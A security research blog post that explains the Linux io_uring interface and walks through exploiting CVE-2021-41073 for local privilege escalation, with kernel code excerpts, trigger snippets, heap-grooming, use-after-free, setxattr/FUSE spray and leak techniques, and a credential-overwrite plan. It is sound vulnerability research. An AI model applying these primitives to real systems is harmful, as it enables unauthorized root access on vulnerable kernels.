Valentina Palmiotti
Sep 8, 2022

Put an io_uring on it: Exploiting the Linux Kernel

By: Valentina Palmiotti, @chompie1337

At Grapl we believe that in order to build the best defensive system we need to deeply understand attacker behaviors. As part of that goal we're investing in offensive security research. Keep up with our blog for new research on high risk vulnerabilities, exploitation, and advanced threat tactics.

This blog post covers io_uring, a new Linux kernel system call interface, and how I exploited it for local privilege escalation (LPE).

A breakdown of the topics and questions discussed:

  • What is io_uring? Why is it used?
  • What is it used for?
  • How does it work?
  • How do I use it?
  • Finding a vulnerability to exploit, CVE-2021-41073 [13]
  • Turning a type confusion vulnerability into memory corruption
  • Linux kernel memory fundamentals and tracking
  • Exploring the io_uring codebase for tools to construct exploit primitives
  • Creating new Linux kernel exploitation techniques and modifying existing ones
  • Finding target objects in the Linux kernel for exploit primitives
  • Mitigations and considerations to make exploitation harder in the future

As with my last post, I started this project with no prior knowledge of io_uring. This blog post will document the journey of tackling an unfamiliar part of the Linux kernel and ending up with a working exploit. My hope is that it will be useful to those interested in binary exploitation or kernel hacking and demystify the process. I also break down the different challenges I faced as an exploit developer and evaluate the practical effect of current exploit mitigations.

io_uring: What is it?

Put simply, io_uring is a system call interface for Linux. It was first introduced in upstream Linux kernel version 5.1 in 2019 [1]. It enables an application to initiate system calls that are performed asynchronously. Initially, io_uring just supported simple I/O system calls like read() and write(), but support for more is growing rapidly. It may eventually have support for most system calls [5].

Why is it Used?

The motivation behind io_uring is performance. Although it is still relatively new, its performance has improved quickly over time. Just last month, the creator and lead developer Jens Axboe boasted 13M per-core peak IOPS [2]. There are a few key design elements of io_uring that reduce overhead and boost performance.

With io_uring, system calls can be completed asynchronously. This means an application thread does not have to block while waiting for the kernel to complete the system call. It can simply submit a request for a system call and retrieve the results later; no time is wasted by blocking.

Additionally, batches of system call requests can be submitted all at once. A task that would normally require multiple system calls can be reduced to just one. There is even a new feature that can reduce the number of system calls down to zero [7]. This vastly reduces the number of context switches from user space to kernel and back. Each context switch adds overhead, so reducing them yields performance gains.

In io_uring, the bulk of the communication between the user space application and the kernel is done via shared buffers. This eliminates a large amount of overhead when performing system calls that transfer data between kernel and user space. For this reason, io_uring can be a zero-copy system [4].

There is also a feature for “fixed” files that can improve performance. Before a read or write operation can occur with a file descriptor, the kernel must take a reference to the file. Because the file reference occurs atomically, this causes overhead [6]. With a fixed file, this reference is held open, eliminating the need to take the reference for every operation.

The overhead of blocking, context switches, or copying bytes may not be noticeable in most cases, but in high performance applications it can start to matter [8]. It is also worth noting that system call performance has regressed after workaround patches for Spectre and Meltdown, so reducing system calls can be an important optimization [9].

What is it Used for?

As noted above, high performance applications can benefit from using io_uring. It can be particularly useful for applications that are server/backend related, where a significant proportion of the application time is spent waiting on I/O.

How Do I Use it?

Initially, I intended to use io_uring by making io_uring system calls directly (similar to what I did for eBPF). This is a pretty arduous endeavor, as io_uring is complex and the user space application is responsible for a lot of the work to get it to function properly. Instead, I did what a real developer would do if they wanted their application to make use of io_uring - use liburing.

liburing is the user space library that provides a simplified API to interface with the io_uring kernel component [10]. It is developed and maintained by the lead developer of io_uring, so it is updated as things change on the kernel side.

One thing to note: io_uring does not implement versioning for its structures [11]. So if an application uses a new feature, it first needs to check whether the kernel of the system it is running on supports it. Luckily, the io_uring_setup system call returns this information [12].
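For example, here's a minimal sketch of that feature check using liburing (io_uring_setup is called under the hood and fills out an io_uring_params structure; the specific feature flag tested is just an illustration):

#include <liburing.h>
#include <stdio.h>

int main(void)
{
        struct io_uring ring;
        struct io_uring_params params = { 0 };

        /* io_uring_setup() fills params.features with IORING_FEAT_* bits */
        if (io_uring_queue_init_params(8, &ring, &params) < 0)
                return 1;

        if (params.features & IORING_FEAT_FAST_POLL)
                printf("kernel supports IORING_FEAT_FAST_POLL\n");

        io_uring_queue_exit(&ring);
        return 0;
}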

Because of the fast rate of development of both io_uring and liburing, the available documentation is out of date and incomplete. Code snippets and examples found online are inconsistent, because new functions render the old ones obsolete (unless you already know io_uring very well and want more low level control). This is a typical problem for OSS, and is not an indicator of the quality of the library, which is very good. I'm noting it here as a warning, because I found the initial process of using it somewhat confusing. Oftentimes I saw fundamental behavior changes across kernel versions that were not documented.

For a fun example, check out this blog post where the author created a server that performs zero syscalls per request [3].

How Does it Work?

As its name suggests, at the center of the io_uring model are two ring buffers that live in memory shared by user space and the kernel. An io_uring instance is initialized by calling the io_uring_setup syscall. The kernel will return a file descriptor, which the user space application uses to create the shared memory mappings.

The mappings that are created:

  • The submission queue (SQ), a ring buffer, where system call requests are placed
  • The completion queue (CQ), a ring buffer, where completed system call requests are placed
  • The submission queue entries (SQE) array, whose size is chosen during setup

Mappings are created to share memory between user space and kernel

An SQE is filled out and placed in the submission queue ring for every request. A single SQE describes the system call operation that should be performed. The kernel is notified that there is work in the SQ when the application makes an io_uring_enter system call. Alternatively, if the IORING_SETUP_SQPOLL feature is used, a kernel thread is created to poll the SQ for new entries, eliminating the need for the io_uring_enter system call.

An application submitting a request for a read operation to io_uring

When completing each SQE, the kernel first determines whether it will execute the operation asynchronously. If the operation can be done without blocking, it is completed synchronously in the context of the calling thread. Otherwise, it is placed in the kernel async work queue and completed by an io_wrk worker thread. In both cases the calling thread won't block; the difference is whether the operation is completed immediately by the calling thread or by an io_wrk thread later.

When the operation is complete, a completion queue entry (CQE) is placed in the CQ for every SQE. The application can poll the CQ for new CQEs. At that point the application will know that the corresponding operation has been completed. SQEs can be completed in any order, but can be linked to each other if a certain completion order is needed.
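To make this concrete, here is a minimal sketch of the whole round trip with liburing - queue a single read request, submit it, and reap its completion (error handling elided; the file path is illustrative):

#include <fcntl.h>
#include <liburing.h>
#include <stdio.h>

int main(void)
{
        struct io_uring ring;
        struct io_uring_sqe *sqe;
        struct io_uring_cqe *cqe;
        char buf[64];

        io_uring_queue_init(8, &ring, 0);
        int fd = open("/etc/hostname", O_RDONLY);

        /* fill out one SQE describing the read and place it in the SQ */
        sqe = io_uring_get_sqe(&ring);
        io_uring_prep_read(sqe, fd, buf, sizeof(buf), 0);

        /* io_uring_enter() under the hood: tells the kernel there is work */
        io_uring_submit(&ring);

        /* block until a CQE for the request lands in the CQ */
        io_uring_wait_cqe(&ring, &cqe);
        printf("read returned %d\n", cqe->res);
        io_uring_cqe_seen(&ring, cqe);

        io_uring_queue_exit(&ring);
        return 0;
}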

Now that we have a good background on io_uring and how it works, we can move on to discussing the vulnerability.

Finding a Vulnerability

Why io_uring?

Before diving into the vulnerability, I will give some context on my motivations for looking at io_uring in the first place. A question I get asked often is, “How do I pick where to reverse engineer/look for bugs/exploit, etc.?” There is no one-size-fits-all answer to this question, but I can give insight into my reasoning in this particular case.

I became aware of io_uring while doing research on eBPF. These two subsystems are often mentioned together because they both change how user space applications interact with the Linux kernel. I am keen on Linux kernel exploitation, so this was enough to pique my interest. Once I saw how quickly io_uring was growing, I knew it would be a good place to look. The old adage is true - new code means new bugs. When writing in an unsafe programming language like C, which is what the Linux kernel is written in, even the best and most experienced developers make mistakes [16].

Additionally, new Android kernels now ship with io_uring. Because this feature is not inherently sandboxed by SELinux, it is a good source of bugs that could be used for privilege escalation on Android devices.

To summarize, I chose io_uring based on these factors:

  • It is a new subsystem of the Linux kernel, which I have experience exploiting.
  • It introduces a lot of new ways that an unprivileged user can interact with the kernel.
  • New code is being introduced quickly.
  • Exploitable bugs have already been found in it.
  • Bugs in io_uring can be used to exploit Android devices (these are rare, as Android is well sandboxed).

The Vulnerability

As I mentioned previously, io_uring is growing quickly, with many new features being added.

One such feature is IORING_OP_PROVIDE_BUFFERS, which allows the application to register a pool of buffers the kernel can use for operations.

Because of the asynchronous nature of io_uring, selecting a buffer for an operation can get complicated. Since an operation may not complete for an indefinite amount of time, the application would otherwise need to keep track of which buffers are currently in flight for a request. This feature saves the application that trouble and makes buffer selection automatic.

The buffers are grouped by a group ID, buf_group, and each buffer within a group is identified by a buffer ID, bid. When submitting a request, the application indicates that a provided buffer should be used by setting the IOSQE_BUFFER_SELECT flag and specifying the group ID. When the operation is complete, the bid of the buffer used is passed back via the CQE [14].
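Here's a rough sketch of how that flow looks with liburing (error handling and the CQE for the registration are elided; ring, fd, sizes, and group_id are assumed/illustrative):

/* register a pool of 8 buffers of 256 bytes under group_id */
static char pool[8][256];

struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);
io_uring_prep_provide_buffers(sqe, pool, 256, 8, group_id, 0);
io_uring_submit(&ring);

/* issue a read and let the kernel pick one of the provided buffers */
sqe = io_uring_get_sqe(&ring);
io_uring_prep_read(sqe, fd, NULL, 256, 0);  /* no buffer supplied by us */
sqe->flags |= IOSQE_BUFFER_SELECT;
sqe->buf_group = group_id;
io_uring_submit(&ring);

/* the bid of the buffer the kernel used comes back in the CQE flags */
struct io_uring_cqe *cqe;
io_uring_wait_cqe(&ring, &cqe);
int bid = -1;
if (cqe->flags & IORING_CQE_F_BUFFER)
        bid = cqe->flags >> IORING_CQE_BUFFER_SHIFT;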

I decided to play around with this feature after I saw the advisory for CVE-2021-3491 - a bug in this same feature found by Billy Jheng Bing-Jhong [15]. My intention was to recreate a crash with this bug, but I was never able to get the feature to work quite right on the user space side. Fortunately, I decided to keep looking at the kernel code anyway, and found another bug.

When registering a group of provided buffers, the io_uring kernel component allocates an io_buffer structure for each buffer. These are stored in a linked list that contains all the io_buffer structures for a given buf_group.

struct io_buffer {
        struct list_head list;
        __u64 addr;
        __u32 len;
        __u16 bid;
};

Each request has an associated io_kiocb structure, where information is stored to be used during completion. In particular, it contains a field named rw, an io_rw structure that stores information about read/write requests:

struct io_rw {
        struct kiocb                       kiocb;
        u64                                addr;
        u64                                len;
};

If a request is submitted with IOSQE_BUFFER_SELECT, the function io_rw_buffer_select is called before the read or write is performed. Here is where I noticed something strange.

static void __user *io_rw_buffer_select(struct io_kiocb *req, size_t *len,
                                        bool needs_lock)
{
        struct io_buffer *kbuf;
        u16 bgid;

        kbuf = (struct io_buffer *) (unsigned long) req->rw.addr;
        bgid = req->buf_index;
        kbuf = io_buffer_select(req, len, bgid, kbuf, needs_lock);
        if (IS_ERR(kbuf))
                return kbuf;
        req->rw.addr = (u64) (unsigned long) kbuf;
        req->flags |= REQ_F_BUFFER_SELECTED;
        return u64_to_user_ptr(kbuf->addr);
}

Here, the pointer to the request’s io_kiocb structure is called req. Near the bottom of the function, in the statement req->rw.addr = (u64) (unsigned long) kbuf;, the io_buffer pointer for the selected buffer is stored in req->rw.addr. This is strange, because this is where the (user space) target address for reading/writing is supposed to be stored! And here it is being filled with a kernel address…

It turns out that if a request is sent using the IOSQE_BUFFER_SELECT flag, the REQ_F_BUFFER_SELECT flag is set in req->flags on the kernel side. Requests with this flag are handled slightly differently in certain spots in the code: instead of taking the user space address from req->rw.addr, the kernel uses the selected buffer’s kbuf->addr.

Using the same field for user and kernel pointers seems dangerous - are there any spots where the REQ_F_BUFFER_SELECT case was forgotten and the two types of pointer were confused?

I looked in places where read/write operations were being done. My hope was to find a bug that gives a kernel write with user controllable data. I had no such luck - I didn’t see any places where the address stored in req->rw.addr would be used for a read/write if REQ_F_BUFFER_SELECT is set. However, I still managed to find a confusion of lesser severity in the function loop_rw_iter:

/*
 * For files that don't have ->read_iter() and ->write_iter(), handle them
 * by looping over ->read() or ->write() manually.
 */
static ssize_t loop_rw_iter(int rw, struct io_kiocb *req, struct iov_iter *iter)
{
        struct kiocb *kiocb = &req->rw.kiocb;
        struct file *file = req->file;
        ssize_t ret = 0;

        /*
         * Don't support polled IO through this interface, and we can't
         * support non-blocking either. For the latter, this just causes
         * the kiocb to be handled from an async context.
         */
        if (kiocb->ki_flags & IOCB_HIPRI)
                return -EOPNOTSUPP;
        if (kiocb->ki_flags & IOCB_NOWAIT)
                return -EAGAIN;

        while (iov_iter_count(iter)) {
                struct iovec iovec;
                ssize_t nr;

                if (!iov_iter_is_bvec(iter)) {
                        iovec = iov_iter_iovec(iter);
                } else {
                        iovec.iov_base = u64_to_user_ptr(req->rw.addr);
                        iovec.iov_len = req->rw.len;
                }

                if (rw == READ) {
                        nr = file->f_op->read(file, iovec.iov_base,
                                              iovec.iov_len, io_kiocb_ppos(kiocb));
                } else {
                        nr = file->f_op->write(file, iovec.iov_base,
                                               iovec.iov_len, io_kiocb_ppos(kiocb));
                }

                if (nr < 0) {
                        if (!ret)
                                ret = nr;
                        break;
                }
                ret += nr;
                if (nr != iovec.iov_len)
                        break;
                req->rw.len -= nr;
                req->rw.addr += nr;
                iov_iter_advance(iter, nr);
        }

        return ret;
}

For each open file descriptor, the kernel keeps an associated file structure, which contains a file_operations structure, f_op. This structure holds pointers to functions that perform various operations on the file. As the description for loop_rw_iter states, if the type of file being operated on doesn’t implement the read_iter or write_iter operation, this function is called to do an iterative read/write manually. This is the case for /proc filesystem files (like /proc/self/maps, for example).

The first part of the offending function performs the proper checks. Inside the loop, the iter structure is checked with iov_iter_is_bvec: if REQ_F_BUFFER_SELECT is set, iter is not a bvec and the iovec is taken from the iter itself; req->rw.addr is only used as the base address for the read/write in the bvec case.

The bug is at the bottom of the loop. As the function name suggests, its purpose is to perform an iterative read/write in a loop. At the end of each iteration, the base address is advanced by the size in bytes of the read/write just performed, so that it points to where the last r/w left off in case another iteration is needed. For the case of REQ_F_BUFFER_SELECT, the base address should only be advanced by the iov_iter_advance call. But no check is performed like at the beginning of the function - the statement req->rw.addr += nr; runs unconditionally, so both addresses are advanced. This is a type confusion - the code treats the address in req->rw.addr as if it were a user space pointer.

Remember, if REQ_F_BUFFER_SELECT is set, then req->rw.addr is a kernel address and points to the io_buffer used to represent the selected buffer. This doesn’t really affect anything during the operation itself, but after it is completed, the function io_put_rw_kbuf is called:

static inline unsigned int io_put_rw_kbuf(struct io_kiocb *req)
{
        struct io_buffer *kbuf;

        if (likely(!(req->flags & REQ_F_BUFFER_SELECTED)))
                return 0;
        kbuf = (struct io_buffer *) (unsigned long) req->rw.addr;
        return io_put_kbuf(req, kbuf);
}

Above, the request’s flags are checked for REQ_F_BUFFER_SELECTED. If it is set, the function io_put_kbuf is called with req->rw.addr as the kbuf parameter. The code for the called function is below:

static unsigned int io_put_kbuf(struct io_kiocb *req, struct io_buffer *kbuf)
{
        unsigned int cflags;

        cflags = kbuf->bid << IORING_CQE_BUFFER_SHIFT;
        cflags |= IORING_CQE_F_BUFFER;
        req->flags &= ~REQ_F_BUFFER_SELECTED;
        kfree(kbuf);
        return cflags;
}

As seen above, kfree is called on kbuf (whose value is the address in req->rw.addr). Since this pointer was advanced by the size of the read/write performed, the originally allocated buffer isn’t the one being freed! Instead, what effectively happens is:

kfree(kbuf + user_controlled_value);

where user_controlled_value is the size of the completed read or write.
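On a vulnerable (pre-patch) kernel, the whole trigger boils down to something like the following sketch, assuming a buffer pool has already been registered under group_id as shown earlier (ring, file path, and sizes are illustrative):

/* /proc files have no ->read_iter, so the request goes through loop_rw_iter() */
int fd = open("/proc/self/maps", O_RDONLY);

struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);
io_uring_prep_read(sqe, fd, NULL, 32, 0);   /* bytes read == offset of the free */
sqe->flags |= IOSQE_BUFFER_SELECT;
sqe->buf_group = group_id;
io_uring_submit(&ring);

/* on completion, io_put_kbuf() effectively does kfree(kbuf + bytes_read)
   instead of kfree(kbuf) */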

Since an io_buffer structure is 32 bytes, we effectively gain the ability to free buffers in the kmalloc-32 cache at a controllable offset from our originally allocated buffer. I’ll talk a little more about Linux kernel memory internals in the next section, but the diagram below gives a visual of the bug:

Exploitation

The previous section covered the vulnerability; now it’s time to construct an exploit. For those who want to skip right to the exploit strategy, it is as follows:

  • Set the affinity of the application’s threads and io_wrk threads to the same CPU core, so they both use the same kmalloc-32 cache slab.
  • Spray the kmalloc-32 cache with io_buffer structures to drain all partially free slabs. Subsequent 32 byte allocations will be contiguous in a freshly allocated slab page. Now the vulnerability can be used as a use-after-free primitive.
  • Use the use-after-free primitive to construct universal object-leaking and object-overwriting primitives.
  • Use the object-leaking primitive to leak the contents of an io_tctx_node structure, which contains a pointer to the task_struct of a thread belonging to our process.
  • Use the object-leaking primitive to leak the contents of a seq_operations structure to break KASLR.
  • Use the object spray primitive to allocate a fake bpf_prog structure.
  • Use the object-leaking primitive to leak the contents of an io_buffer, which contains a list_head field. This leaks the address of the controllable portion of the heap, which in turn gives the address of the fake bpf_prog.
  • Use the object-overwriting primitive to overwrite an sk_filter structure. This object contains a pointer to the eBPF program attached to a socket. Replace the existing bpf_prog pointer with the fake one.
  • Write to the attached socket to trigger execution of the fake eBPF program, which is used to escalate privileges. The leaked task_struct is used to retrieve the pointer to the cred structure of our process and overwrite uid and euid.

Building Primitives

The first step is to develop the exploit primitives. An exploit primitive is a generic building block for an exploit. An exploit will usually combine multiple primitives to achieve its goal (code execution, privilege escalation, etc.). Some primitives are better than others - for example, arbitrary read and arbitrary write are very strong primitives. The ability to read and write at any address is usually enough to achieve whatever the exploit goal is.

In this case, the initial primitive we gain is pretty weak. We can free a kernel buffer at an offset we control. But we don’t actually know anything about where the buffer is or what is around it. It will take some creativity to turn it into something useful.

From Type Confusion to Use-After-Free (UAF)

Because we control the freeing of a kernel buffer, it makes the most sense to turn this primitive into a stronger use-after-free primitive. If you aren’t familiar with what a use-after-free is, here’s the basic idea: A program uses some allocated memory, then somehow (either due to a bug or an exploit primitive) that memory is freed. After it is freed, the attacker triggers the reallocation of the same buffer and the original contents are overwritten. If the program that originally allocated the memory uses it after this occurs, it will be using the same memory, but its contents have been reallocated and used for something else! If we can control the new contents of the memory, we can influence how the program behaves. Essentially, it allows for overwriting an object in memory.

Now, the basic plan is simple: allocate an object, use the bug to free it, then reallocate the memory and overwrite it with controllable data. At this point, I didn’t know what kind of object to target - first I had to overwrite any object at all.

This turned out to be a good idea, because initially I was not able to reliably trigger the reallocation of the buffer freed by the bug. As shown below, the freed buffer has a different address than the reallocated buffer.

Debugging exploit in the kernel with printk()

My first inclination was that buffer size had something to do with it. 32 bytes is small, and there are a lot of kernel objects of the same size. Perhaps the race to allocate the freed buffer was lost every single time. I tested this by altering the definition of the io_buffer structure in the kernel. After some experimentation with different sizes, I confirmed that buffer size wasn’t the problem.

After learning a bit about Linux kernel memory internals and some debugging, I found the answer. You don’t need deep knowledge of Linux kernel memory internals to understand this exploit. However, knowing the general idea of how virtual memory is managed can be important for memory corruption vulnerabilities. I’ll give a very basic overview and point out the relevant parts in the next section.

Linux Kernel Memory: SLOB on my SLAB

The Linux kernel has several memory allocators in the code tree: SLOB, SLAB, and SLUB. They are mutually exclusive - only one of them can be compiled into the kernel. These allocators are the memory management layer that works on top of the system’s low level page allocator [20].

The Linux kernel currently uses the SLUB allocator by default. For background, I will give a very brief explanation on how this memory allocator works.

SLUB maintains several memory caches that each hold either a single type of object or generic objects of similar size.

Each one of these caches is represented by a kmem_cache structure, which holds a list of free objects and a list of slabs. Slabs (not to be confused with SLAB which is a different Linux kernel memory allocator) consist of one or more pages that are sliced into smaller blocks of memory for allocation. When the list of free objects is empty, a new slab page is allocated. In SLUB, each slab page is associated with a CPU. Each free object contains a metadata header that includes a pointer for the next free object in the cache.

Though it isn’t necessary to understand the rest of this post, if you want to know more about the internals of the Linux kernel memory allocators check out these great blog posts [20] [21][23] and these slides [22].

Memory Grooming

The first goal is to get contiguously allocated buffers. Given the nature of the bug, the target object for the UAF needs to be at a positive offset from the originating io_buffer, and the offset has to be knowable.

We can start by draining the cache’s freelist and ensuring that a fresh slab page is allocated. Afterwards, subsequent allocations will be contiguous to each other on the same slab page. We do this by triggering the allocation of many 32 byte objects, which can be done by registering many buffers using io_uring_prep_provide_buffers. Remember, an io_buffer object will be allocated for each buffer registered.

io_uring_prep_provide_buffers(sqe, bufs1, 0x100, 1000, group_id1, 0);

The line of code above triggers the allocation of 1000 32-byte io_buffer structures in the kernel. Each one stays in memory until it is used to complete an io_uring request, which means they can be kept in memory indefinitely.

When the target object is allocated, it should land next to the io_buffer structs that were just sprayed. Luckily, provided buffers for each buf_group are used in Last-In-First-Out (LIFO) order. So, the first io_buffer used for an operation will be the last one that was allocated. Now the offset to the target object is knowable!
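Putting the grooming together, the spray looks roughly like this (NUM_GROUPS, bufs, and the group IDs are illustrative names, not from the original exploit):

/* drain the kmalloc-32 freelist; later allocations land on fresh slab pages */
for (int g = 0; g < NUM_GROUPS; g++) {
        struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);
        io_uring_prep_provide_buffers(sqe, bufs[g], 0x100, 1000, group_id1 + g, 0);
        io_uring_submit(&ring);
        /* ... reap the CQE for each registration ... */
}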

What About CONFIG_SLAB_FREELIST_RANDOM?

The kernel configuration CONFIG_SLAB_FREELIST_RANDOM (which is set in distributions like Ubuntu) randomizes the order in which buffers get added to the freelist when a new slab page is allocated. This means allocations on a new slab page will not be contiguous in virtual memory.

This mitigation is annoying, but easily bypassable. The first step is the same: spray to ensure an io_buffer struct lands in a freshly allocated slab page. Then, spray the cache with target objects. This way, there is a high likelihood of a target object being allocated contiguously to the io_buffer that will trigger the freeing. The randomization only applies to the order buffers are added to the freelist - the list itself is still LIFO.

Bypassing CONFIG_SLAB_FREELIST_RANDOM

Linux Kernel Memory Tracking

There are a lot of ways to track Linux kernel memory. I decided to learn at least one of them and chose the kmem event tracing subsystem, which is built on ftrace. I chose it because it seemed to require the least effort - I don’t want to write any code; even one line is too many.

The setup is simple: pass the following in your kernel’s boot parameters:

trace_event=kmem:kmalloc,kmem:kmem_cache_alloc,kmem:kfree,kmem:kmalloc_node

Then you can trace all memory allocations and frees in the kernel by running:

cat /sys/kernel/debug/tracing/trace

To deobfuscate the virtual memory addresses, add no_hash_pointers to the kernel boot parameters as well.

Tracking kernel memory

The first, second, and third columns represent the task name, pid, and CPU ID of the calling thread, respectively. On the first line, you can see the buffer that is freed by the bug in io_put_kbuf (which is inlined into kiocb_done during compilation). On the second line is the attempt to reallocate this freed buffer.

Now with a basic background of how Linux kernel memory and io_uring works, can you spot the problem?

The buffer is being freed in a thread running on CPU 0 and the reallocation attempt is happening on CPU 1. Now the problem is obvious! The completion of the io_uring read request happens asynchronously, so it happens in the context of an io_wrk thread. The reallocation happens in a thread from our process. Remember that cache slab pages are processor specific, so it’s necessary that the free and reallocation occur on the same CPU.

I already knew, from Jann Horn’s research, that sched_setaffinity can be used to pin a thread to run on a specific CPU core [17]. Unfortunately, this only applies to threads from our own application. We also need a way to control the affinity of the io_wrk threads created by the io_uring kernel component.

Exploring io_uring Features

Because io_uring is performance oriented, I looked for a feature that gives the application control over the affinity of io_wrk threads. I got extremely lucky, as such a feature was introduced a few months prior - just in time for me to abuse it [18]. Using IORING_REGISTER_IOWQ_AFF, you can set the CPU affinity for io_wrk threads. So I can pin the thread from my process and the io_wrk thread to the same CPU core, using sched_setaffinity and io_uring_register_iowq_aff respectively.
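In code, pinning both sides to CPU 0 looks something like this (sketch; error handling elided):

#define _GNU_SOURCE   /* must come before any includes */
#include <sched.h>

cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(0, &set);

/* pin our own thread... */
sched_setaffinity(0, sizeof(set), &set);
/* ...and io_uring's io_wrk threads to the same core */
io_uring_register_iowq_aff(&ring, sizeof(set), &set);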

Now the reallocation works as expected:

Now that a reallocation can be triggered reliably, let’s figure out what to do with it.  

Universal Heap Spray

Once I was able to successfully turn the bug into a UAF, I immediately revisited Vitaly Nikolenko’s research. He created a Linux kernel exploit technique for a universal heap spray using the setxattr system call [19].

This universal heap spray technique provides a way to:

  • Allocate an object of any size
  • Control the contents of the object
  • Keep the object in memory indefinitely

The setxattr system call sets the value of an extended attribute associated with a file. When it is executed, the kernel allocates a buffer of a size controlled by the calling user space application (the kvmalloc call below) and copies the user provided attribute buffer into it (the copy_from_user call).

static long
setxattr(struct user_namespace *mnt_userns, struct dentry *d,
     const char __user *name, const void __user *value, size_t size,
     int flags)
{
   ...
    if (size) {
        if (size > XATTR_SIZE_MAX)
            return -E2BIG;
        kvalue = kvmalloc(size, GFP_KERNEL);
        if (!kvalue)
            return -ENOMEM;
        if (copy_from_user(kvalue, value, size)) {
            error = -EFAULT;
            goto out;
        }
    ...
    error = vfs_setxattr(mnt_userns, d, kname, kvalue, size, flags);
out:
    kvfree(kvalue);
    return error;
}

userfaultfd allows a user space application to handle page faults, something that would otherwise be handled by the kernel. That means that if the memory pointed to by value in the above code is registered with userfaultfd, the copy_from_user call will block until the application resolves the page fault.

Now imagine mapping two adjacent pages of memory, where the second page has a userfaultfd page handler set. The value buffer is of size n: n-8 bytes are on the first page and the remaining 8 bytes on the second page. The kernel will handle the page fault of the first page and copy n-8 bytes into the kernel buffer. Then, it will block for the final 8 bytes, waiting for user space to resolve the page fault of the second page.

With this technique, an unprivileged application can allocate a kernel object of size n written with n-8 bytes of controllable data, and the object stays in memory indefinitely.
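A minimal sketch of the setup, assuming userfaultfd is available to unprivileged users (the fault-handler thread and error handling are elided; the file and attribute names are illustrative):

#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/xattr.h>
#include <unistd.h>

long page = sysconf(_SC_PAGESIZE);

/* two adjacent pages; the attribute value straddles the boundary */
char *map = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

/* register the second page so copy_from_user() faults and blocks on it */
int uffd = syscall(SYS_userfaultfd, O_CLOEXEC | O_NONBLOCK);
struct uffdio_api api = { .api = UFFD_API };
ioctl(uffd, UFFDIO_API, &api);
struct uffdio_register reg = {
        .range = { .start = (unsigned long)(map + page), .len = page },
        .mode  = UFFDIO_REGISTER_MODE_MISSING,
};
ioctl(uffd, UFFDIO_REGISTER, &reg);

/* n-8 controlled bytes at the end of the first page, last 8 on the second */
size_t n = 32;                          /* size of the target cache object */
char *value = map + page - (n - 8);
memset(value, 'A', n - 8);

/* allocates a kmalloc-32 buffer, copies n-8 bytes, then blocks */
setxattr("lol.txt", "user.lol", value, n, 0);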

userfaultfd is over, FUSE is in

The Linux kernel now provides a sysctl knob to disable userfaultfd for unprivileged users, vm.unprivileged_userfaultfd. Unprivileged access is turned off by default in most major Linux distributions.

However, the same primitive can be achieved by an unprivileged user using FUSE [24]. FUSE provides a framework for implementing a filesystem in user space. What does this mean for exploitation? Reads and writes on a FUSE filesystem are forwarded to a user space application. We can therefore block the kernel during a user space copy by using a memory mapping of a FUSE file.

Instead of mapping two pages and setting a userfaultfd fault handler on the second page, we create one anonymous mapping and one file mapping, using the addr parameter of mmap to ensure the two pages are contiguous in memory.
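The mapping setup then looks roughly like this, assuming we’ve mounted our own FUSE filesystem (the mount point is an assumption, and the FUSE daemon, which simply stalls the read, is not shown):

long page = sysconf(_SC_PAGESIZE);

/* reserve two adjacent pages, then replace the second with a FUSE-backed one */
char *map = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                 MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

int fd = open("/tmp/fuse_mnt/pauser", O_RDWR);  /* file served by our FUSE fs */
mmap(map + page, page, PROT_READ, MAP_PRIVATE | MAP_FIXED, fd, 0);

/* setxattr()'s copy_from_user() now blocks once it crosses into the second
   page, until our FUSE daemon answers the read of the backing file */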

Universal Object Overwrite

The universal heap spray technique is perfect for use-after-frees. After the object has been freed, setxattr will trigger the allocation of the object of size n, overwrite the first n-8 bytes, and then block. Since we successfully turned the vulnerability into a use-after-free primitive, we’ll use this to overwrite arbitrary objects in memory that are allocated from the kmalloc-32 cache.

Universal Heap Leak - A New Technique

Before thinking about types of objects to overwrite, an information leak technique is needed to find where things are in memory (function addresses, credential structures, heap pointers, etc). I realized I could turn the aforementioned technique from a universal heap spray primitive into a universal heap leak primitive with this one weird trick. In the original UAF use case for this technique, setxattr reallocates a buffer that has already been freed. But what if the setxattr buffer is freed instead?

One Weird Trick

First, use the heap spray technique: call setxattr, which blocks while copying the last 8 bytes from user space. At this point, most of the data has already been copied over to the allocated kernel buffer. In another thread, trigger the freeing of the setxattr buffer using the bug. Then, trigger the allocation of the object to leak. This should reallocate and overwrite the kernel buffer that setxattr is using to store attribute data. Finally, unblock setxattr. Now the kernel will use the data in kvalue to set the file attribute. Extended file attributes are stored as binary data, so to get an extended attribute of a file, we can use setxattr’s counterpart - getxattr. Remember, when the attribute is set, the kernel buffer used has been overwritten with the data from the new object.

So, the contents of the object can be leaked by calling getxattr:

setxattr("lol.txt", "user.lol", xattr_buf, 32, 0);
getxattr("lol.txt", "user.lol", leakbuf, 32);

Target Objects

So far I’ve only spoken about general techniques. We haven’t picked what objects we want to use along with the techniques. I haven’t seen the objects I chose used in other exploits, so hopefully it can provide ideas for exploiting a tough cache like kmalloc-32.

When first looking for objects, I looked within io_uring itself. There are a lot of interesting objects, many of which contain pointers to cred and task_struct structures. I had not seen other kernel exploits utilizing io_uring objects until recently, when I came across a blog post by Awaru [25].

I used a couple of other strategies to find target objects as well. One was using Linux kernel memory tracing on a test machine and seeing what 32-byte objects are allocated. I also wrote a quick script using pahole to output all of the structures of a specific size. One trick I learned from Alexander Popov’s blog post is to enable features that are common across many distros, which increases the number of kernel objects available [26].

Objects for Leaking:

io_tctx_node:

An io_tctx_node structure is allocated for each new thread that sends an io_uring request. There can be multiple io_tctx_nodes in a single process if multiple threads call into io_uring. The field to leak is task, the pointer to the thread’s task_struct. The allocation of this object can be triggered by creating a new thread and making an io_uring system call, as in the sketch below.
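A minimal sketch of the trigger (error handling elided):

#include <pthread.h>

/* the first io_uring_enter() from a new thread allocates its io_tctx_node */
static void *alloc_tctx_node(void *arg)
{
        struct io_uring *ring = arg;
        struct io_uring_sqe *sqe = io_uring_get_sqe(ring);
        io_uring_prep_nop(sqe);
        io_uring_submit(ring);
        return NULL;
}

pthread_t t;
pthread_create(&t, NULL, alloc_tctx_node, &ring);
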